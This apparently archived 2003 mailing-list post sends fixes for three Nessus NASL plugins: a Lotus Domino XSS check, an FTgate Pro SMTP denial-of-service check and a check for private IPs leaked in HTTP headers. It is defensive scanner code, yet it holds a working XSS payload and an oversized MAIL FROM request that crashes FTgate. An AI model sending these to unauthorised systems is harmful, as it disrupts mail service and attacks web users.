Hi, 11394 Here's a new version that uses bodyonly:1 11579 The update you have done is still broken, i.e. destructive test is done in safe mode. The exit(0) went in the wrong place. Fix attached. 10759 Sorry, minor bug introduced by me. The desc["english"] needs to be outside the if(description) block as it is used further down the plugin. Fix attached. Is there any news on my changes for 10297, 11393 and 10815? I can send the code again if necessary. Regards, Paul -- Paul Johnston Internet Security Specialist Westpoint Limited Albion Wharf, 19 Albion Street, Manchester, M1 5LN England Tel: +44 (0)161 237 1028 Fax: +44 (0)161 237 1031 email: paulat_private web: www.westpoint.ltd.uk # # This script is (C) Renaud Deraison # if(description) { script_id(11394); script_version ("$Revision: 1.3 $"); script_bugtraq_id(2962); script_cve_id("CVE-2001-1161"); name["english"] = "Lotus Domino XSS"; script_name(english:name["english"]); desc["english"] = " The remote server is vulnerable to cross-site scripting, when requesting a .nsf file with html arguments, as in : GET /home.nsf/<img%20src=javascript:alert(document.domain)> Solution : Upgrade to Domino 5.0.8 or newer Risk factor : Medium"; script_description(english:desc["english"]); summary["english"] = "Checks for Lotus Domino XSS"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "http_version.nasl", "no404.nasl", "domino_default_db.nasl"); script_require_ports("Services/www", 80); script_require_keys("www/domino"); exit(0); } # # The script code starts here # include("http_func.inc"); include("http_keepalive.inc"); port = get_kb_item("Services/www"); if(!port)port = 80; if(!get_port_state(port))exit(0); list = get_kb_list(string("www/domino/", port, "/db")); if(!isnull(list)) { file = list[0]; } else { list = get_kb_list(string("www/", port, "/content/extensions/nsf")); if(!isnull(list))file = list[0]; else file = "/home.nsf"; # Maybe we'd better exit now. } req = http_get(item:string(file,"/<img%20src=javascript:alert(document.domain)>"), port:port); res = http_keepalive_send_recv(port:port, data:req, bodyonly:1); if ( res == NULL ) exit (0); if("<img src=javascript:alert(document.domain)>" >< res ) security_warning(port); # # This script was written by Renaud Deraison <deraisonat_private> # # See the Nessus Scripts License for details # # Ref: # From: "Dennis Rand" <derat_private> # To: "Vulnwatch@Vulnwatch. Org" <vulnwatchat_private>, # Date: Tue, 6 May 2003 14:57:25 +0200 # Subject: [VulnWatch] Multiple Buffer Overflow Vulnerabilities Found in FTGate Pro Mail Server v. 1.22 (1328) if(description) { script_id(11579); script_version ("$Revision: 1.2 $"); name["english"] = "FTgate DoS"; script_name(english:name["english"]); desc["english"] = " The remote SMTP server is running FT Gate Pro. There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands. An attacker may use this flaw to prevent this host from processing the mail it should process. Solution : Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330 Risk Factor : Serious"; script_description(english:desc["english"]); summary["english"] = "Checks for FTgate"; script_summary(english:summary["english"]); script_category(ACT_MIXED_ATTACK); script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison", francais:"Ce script est Copyright (C) 2003 Renaud Deraison"); family["english"] = "Denial of Service"; script_family(english:family["english"]); script_dependencie("find_service.nes"); script_require_ports("Services/smtp", 25); exit(0); } # # The script code starts here # include("smtp_func.inc"); port = get_kb_item("Services/smtp"); if(!port)port = 25; banner = get_smtp_banner(port:port); if(banner) { if("FTGatePro" >< banner) { if(safe_checks()) { report = " The remote SMTP server is running FT Gate Pro. There is a flaw in this version which may allow an attacker to disable this SMTP server remotely, by supplying a too long argument to the MAIL FROM and RCPT TO SMTP commands. An attacker may use this flaw to prevent this host from processing the mail it should process. *** Since safe checks are enabled, Nessus could not verify this *** flaw nor the version of the remote FTGatePro server, so this *** might be a false positive Solution : Upgrade to FTgate Pro Mail Server v. 1.22 Hotfix 1330 Risk Factor : Serious"; security_hole(port:port, data:report); exit(0); } soc = open_sock_tcp(port); if(!soc)exit(0); r = smtp_recv_banner(socket:soc); send(socket:soc, data:string("HELO there\r\n")); r = recv_line(socket:soc, length:4096); send(socket:soc, data:string("MAIL FROM: ", crap(2400), "@", crap(2400),".com\r\n\r\n")); r = recv_line(socket:soc, length:4096, timeout:1); close(soc); soc = open_sock_tcp(port); if(!soc){ security_hole(port); exit(0); } r = smtp_recv_banner(socket:soc); if(!r)security_hole(port); close(soc); } } # # This script was written by Georges Dagousset <georges.dagoussetat_private> # Modified by Paul Johnston for Westpoint Ltd <paulat_private> # # See the Nessus Scripts License for details # desc["english"] = " This web server leaks a private IP address through its HTTP headers. This may expose internal IP addresses that are usually hidden or masked behind a Network Address Translation (NAT) Firewall or proxy server. There is a known issue with IIS 4.0 doing this in its default configuration. See http://support.microsoft.com/support/kb/articles/Q218/1/80.ASP See the Bugtraq reference for a full discussion. Risk factor : Low The private IP address is : "; if(description) { script_id(10759); script_cve_id("CAN-2000-0649"); script_bugtraq_id(1499); script_version ("$Revision: 1.8 $"); name["english"] = "Private IP address leaked in HTTP headers"; script_name(english:name["english"]); script_description(english:desc["english"]); summary["english"] = "Checks for private IP addresses in HTTP headers"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2001 Alert4Web.com, 2003 Westpoint Ltd"); family["english"] = "General"; script_family(english:family["english"]); script_dependencie("find_service.nes", "http_version.nasl"); script_require_ports("Services/www", 80); script_require_keys("www/iis"); exit(0); } # # The script code starts here # include("http_func.inc"); port = get_kb_item("Services/www"); if(!port) port = 80; # # Craft our own HTTP/1.0 request for the server banner. # Note: HTTP/1.1 is rarely useful for detecting this flaw. # soc = http_open_socket(port); if(!soc) exit(0); send(socket:soc, data:string("GET / HTTP/1.0\r\n\r\n")); banner = http_recv_headers(soc); http_close_socket(soc); # # Check for private IP addresses in the banner # Ranges are: 10.x.x.x, 172.16-31.x.x, 192.168.x.x # private_ip = eregmatch(pattern:"(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})", string:banner); if(!isnull(private_ip)) { security_warning(port:port, data:string(desc["english"], private_ip[0])); }
This archive was generated by hypermail 2b30 : Thu Sep 18 2003 - 08:32:08 PDT